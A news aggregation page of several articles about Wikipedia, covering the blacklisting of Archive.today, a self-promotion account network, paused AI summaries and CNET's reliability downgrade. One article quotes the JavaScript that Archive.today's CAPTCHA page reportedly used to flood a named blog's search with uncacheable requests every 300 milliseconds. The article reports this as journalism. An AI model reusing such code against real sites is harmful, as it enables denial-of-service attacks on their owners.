wikipedia

wikipedia-blacklists-archive.today,-starts-removing-695,000-archive-links

Wikipedia blacklists Archive.today, starts removing 695,000 archive links

The English-language edition of Wikipedia is blacklisting Archive.today after the controversial archive site was used to direct a distributed denial of service (DDoS) attack against a blog.

In the course of discussing whether Archive.today should be deprecated because of the DDoS, Wikipedia editors discovered that the archive site altered snapshots of webpages to insert the name of the blogger who was targeted by the DDoS. The alterations were apparently fueled by a grudge against the blogger over a post that described how the Archive.today maintainer hid their identity behind several aliases.

“There is consensus to immediately deprecate archive.today, and, as soon as practicable, add it to the spam blacklist (or create an edit filter that blocks adding new links), and remove all links to it,” stated an update today on Wikipedia’s Archive.today discussion. “There is a strong consensus that Wikipedia should not direct its readers towards a website that hijacks users’ computers to run a DDoS attack (see WP:ELNO#3). Additionally, evidence has been presented that archive.today’s operators have altered the content of archived pages, rendering it unreliable.”

More than 695,000 links to Archive.today are distributed across 400,000 or so Wikipedia pages. The archive site is commonly used to bypass news paywalls, and the FBI has sought information on the site operator’s identity with a subpoena to domain registrar Tucows.

“Those in favor of maintaining the status quo rested their arguments primarily on the utility of archive.today for verifiability,” said today’s Wikipedia update. “However, an analysis of existing links has shown that most of its uses can be replaced. Several editors started to work out implementation details during this RfC [request for comment] and the community should figure out how to efficiently remove links to archive.today.”

Editors urged to remove links

Guidance published as a result of the decision asked editors to help remove and replace links to the following domain names used by the archive site: archive.today, archive.is, archive.ph, archive.fo, archive.li, archive.md, and archive.vn. The guidance says editors can remove Archive.today links when the original source is still online and has identical content; replace the archive link so it points to a different archive site, like the Internet Archive, Ghostarchive, or Megalodon; or “change the original source to something that doesn’t need an archive (e.g., a source that was printed on paper), or for which a link to an archive is only a matter of convenience.”

Wikipedia blacklists Archive.today, starts removing 695,000 archive links Read More »

archive.today-captcha-page-executes-ddos;-wikipedia-considers-banning-site

Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site


DDoS hit blog that tried to uncover Archive.today founder’s identity in 2023.

Credit: Getty Images | Riccardo Milani

Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a distributed denial of service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website’s anonymous maintainer.

In a request for comment page, Wikipedia’s volunteer editors were presented with three options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.

Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.

“Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive,” the Wikipedia request for comment said. “Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist.”

Discussion among editors has been ongoing since February 7. “Wikipedia’s need for verifiable citations is absolutely not more important than the security of users,” one editor in favor of blacklisting wrote. “We need verifiable citations so that we can maintain readers’ trust, however, in order to be trustworthy our references also have to be safe to access.”

Archive would be hard to replace

On the other side, an editor who supported Option C wrote that “Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of dead link tags that will never be resolved.”

Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.

One editor supported starting with Option B and eventually shifting to Option A with “the proper end goal being the WMF [Wikimedia Foundation] supporting some sort of archive system, whether their own original or directly supporting the Internet Archive’s work so it can be done more systematically.”

Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. “On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive,” one editor wrote. “It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time.”

Malicious code in CAPTCHA page

The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, “the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with,” the Wikipedia request for comment says. “Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual’s blog.”

The trustworthiness of Archive.today was discussed in light of evidence that the site’s founder threatened to create “a new category of AI porn” in retaliation against the blogger. The AI porn threat was mentioned by several editors.

“I echo others [that Option] A is looking like something we’ll have to do eventually, anyways, and at least this way we have a chance to do it on our terms,” one editor wrote. “I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn’t a trustworthy mirror, and isn’t going to remain one.”

One editor reported being “miserable” about supporting Option A, “but we cannot permit websites to rope our readers into being part of DDoS attacks.” Moreover, “The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It’s strange that we accept links to archive.today for this purpose but don’t accept the same for Anna’s Archive or Sci-Hub,” the editor wrote.

Patokallio told us in an email today, “it’s true that there simply are no alternatives to archive.today for many sources that archive.org does not/cannot cover,” and that he hopes the Wikipedia request for comment “leads to the Wikimedia Foundation creating one as suggested by multiple commenters in the thread.”

We emailed the Archive.today’s webmaster address today about the Wikipedia discussion and will update this article if we get a response.

The Wikimedia Foundation, the nonprofit that hosts Wikipedia, chimed in on the discussion today. “Our view is that the value to verifiability that the site provides must be weighed against the security risks and violation of the trust of the people who click these links,” wrote Eric Mill, head of the foundation’s product safety and integrity group. “We (WMF) encourage the English Wikipedia community to carefully weigh the situation before making a decision on this unusual case.”

Noting that “Archive.today’s owner has not been deterred from continuing the ongoing DDoS,” Mill wrote that “the same actions that make archive.today unsafe may also reduce its usefulness for verifying content on Wikipedia. If the owners are willing to abuse their position to further their goals through malicious code, then it also raises questions about the integrity of the archive it hosts.”

It’s possible the Wikimedia Foundation will act even if the volunteer editors decide to maintain the status quo. “We know that WMF intervention is a big deal, but we also have not ruled it out, given the seriousness of the security concern for people who click the links that appear across many wikis,” Mill wrote.

Blogger tried to uncover founder’s identity

The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are “significant concerns for readers’ safety, as well as the long-term stability and integrity of the service,” but “a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites,” it said.

An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. “Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!” it said.

The code’s first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. “Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources,” he wrote. The Javascript code in the Archive.today CAPTCHA page is as follows:

        setInterval(function()               fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() 8),                   referrerPolicy: "no-referrer",                  mode: "no-cors"              );          , 300);

In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder “Denis Petrov,” which seems to be an alias. Patokallio wasn’t able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, “Masha Rabinovich.”

Patokallio seemed to be driven by curiosity and was impressed by Archive.today’s work. “It’s a testament to their persistence that [they’ve] managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee,” Patokallio’s 2023 post said. In his post this month, Patokallio said his 2023 blog “gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.”

FBI case revives interest in 2023 blog

But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking “subscriber information on [the] customer behind archive.today” in connection with “a federal criminal investigation being conducted by the FBI.” We wrote about the subpoena, and our story included a link to Patokallio’s 2023 blog post in a sentence that said, “There are several indications that the [Archive.today] founder is from Russia.”

In an email to Ars, Patokallio told us that the DDoS attack “appears to be because you kindly mentioned my blog in your Nov 8, 2025 story.” Patokallio added that he is “as mystified by this as you probably are.” Articles about the subpoena by The Verge and Heise Online also linked to Patokallio’s 2023 blog post.

On January 8, 2026, Patokallio’s hosting company, Automattic, notified him that it received a GDPR [General Data Protection Regulation] complaint from a “Nora Puchreiner” alleging that the 2023 post “contains extensive personal data… presented in a narrative that is defamatory in tone and context.” Patokallio said that after he submitted a rebuttal, “Automattic sided with me and left the post up.”

Patokallio said he also “received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months” on January 10. The email was classified as spam by Gmail, and he didn’t see it until five days later, he said. In the meantime, the DDoS started.

Patokallio said he replied to the webmaster’s email on January 15 and again on January 20 but didn’t hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to “change some wording that you feel is being misrepresented.”

Emails threatened AI porn and other scams

Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, “I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience.”

In a later email, “Nora Puchreiner” wrote, “I do not care on your blog and its content. I just need the links from Heise and other media to be 404.” One message threatened to investigate “your Nazi grandfather” and “vibecode a gyrovague.gay dating app.” Another threatened to create a public association between Patokallio’s name and AI porn.

A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails’ veracity, but says the original version threatened to create “a patokallio.gay dating app,” not “a gyrovague.gay dating app.” The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio’s name in a sidebar and discloses that he works for Google in Sydney, Australia, while stating that the blog posts contain only his personal views.

In one email, Patokallio included a link to Wikipedia’s page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.

“And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?” the email said. Patokallio responded, “No, you’re Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last two years, with zero action on my side.”

A subsequent reply in the email thread contained the “Nazi grandfather” and “gay dating app” threats. Patokallio wrote that after these emails, it didn’t seem worthwhile to continue the discussion. “At this point it was pretty clear the conversation had run its course, so here we are,” Patokallio wrote in his February 1 blog post. “And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a ‘Nazi’ in Russia these days.”

While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn’t cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio’s hosting costs more expensive, but “I have a flat fee plan, meaning this has cost me exactly zero dollars,” he wrote.

This article was updated with a statement from the Wikimedia Foundation and further comment from Patokallio.

Photo of Jon Brodkin

Jon is a Senior IT Reporter for Ars Technica. He covers the telecom industry, Federal Communications Commission rulemakings, broadband consumer affairs, court cases, and government regulation of the tech industry.

Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site Read More »

dedicated-volunteer-exposes-“single-largest-self-promotion-operation-in-wikipedia’s-history”

Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history”

After a reduction in activity, things ramped up again in 2021, as IP addresses from around the world started creating Woodard references and articles once more. For instance, “addresses from Canada, Germany, Indonesia, the UK and other places added some trivia about Woodard to all 15 Wikipedia articles about the calea ternifolia.”

Then things got “more sophisticated.” From December 2021 through June 2025, 183 articles were created about Woodard, each in a different language’s Wikipedia and each by a unique account. These accounts followed a pattern of behavior: They were “created, often with a fairly generic name, and made a user page with a single image on it. They then made dozens of minor edits to unrelated articles, before creating an article about David Woodard, then making a dozen or so more minor edits before disappearing off the platform.”

Grnrchst believes that all the activity was meant to “create as many articles about Woodard as possible, and to spread photos of and information on Woodard to as many articles as possible, while hiding that activity as much as possible… I came to believe that David Woodard himself, or someone close to him, had been operating this network of accounts and IP addresses for the purposes of cynical self-promotion.”

After the Grnrchst report, Wikipedia’s global stewards removed 235 articles on Woodard from Wikipedia instances with few users or administrators. Larger Wikipedias were free to make their own community decisions, and they removed another 80 articles and banned numerous accounts.

“A full decade of dedicated self-promotion by an individual network has been undone in only a few weeks by our community,” Grnrchst noted.

In the end, just 20 articles about Woodard remain, such as this one in English, which does not mention the controversy.

We were unable to get in touch with Woodard, whose personal website is password-protected and only available “by invitation.”

Could the whole thing be some kind of “art project,” with the real payoff being exposure and being written about? Perhaps. But whatever the motive behind the decade-long effort to boost Woodard on Wikipedia, the incident reminds us just how much effort some people are willing to put into polluting open or public-facing projects for their own ends.

Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history” Read More »

“yuck”:-wikipedia-pauses-ai-summaries-after-editor-revolt

“Yuck”: Wikipedia pauses AI summaries after editor revolt

Generative AI is permeating the Internet, with chatbots and AI summaries popping up faster than we can keep track. Even Wikipedia, the vast repository of knowledge famously maintained by an army of volunteer human editors, is looking to add robots to the mix. The site began testing AI summaries in some articles over the past week, but the project has been frozen after editors voiced their opinions. And that opinion is: “yuck.”

The seeds of this project were planted at Wikimedia’s 2024 conference, where foundation representatives and editors discussed how AI could advance Wikipedia’s mission. The wiki on the so-called “Simple Article Summaries” notes that the editors who participated in the discussion believed the summaries could improve learning on Wikipedia.

According to 404 Media, Wikipedia announced the opt-in AI pilot on June 2, which was set to run for two weeks on the mobile version of the site. The summaries appeared at the top of select articles in a collapsed form. Users had to tap to expand and read the full summary. The AI text also included a highlighted “Unverified” badge.

Feedback from the larger community of editors was immediate and harsh. Some of the first comments were simply “yuck,” with others calling the addition of AI a “ghastly idea” and “PR hype stunt.”

Others expounded on the issues with adding AI to Wikipedia, citing a potential loss of trust in the site. Editors work together to ensure articles are accurate, featuring verifiable information and a neutral point of view. However, nothing is certain when you put generative AI in the driver’s seat. “I feel like people seriously underestimate the brand risk this sort of thing has,” said one editor. “Wikipedia’s brand is reliability, traceability of changes, and ‘anyone can fix it.’ AI is the opposite of these things.”

“Yuck”: Wikipedia pauses AI summaries after editor revolt Read More »

ai-generated-articles-prompt-wikipedia-to-downgrade-cnet’s-reliability-rating

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI —

Futurism report highlights the reputational cost of publishing AI-generated content.

The CNET logo on a smartphone screen.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET's reliability ratings, as found on Wikipedia's

Enlarge / A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024 at 9: 30am to reflect fixes in the date ranges for CNET on the Perennial Sources page.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating Read More »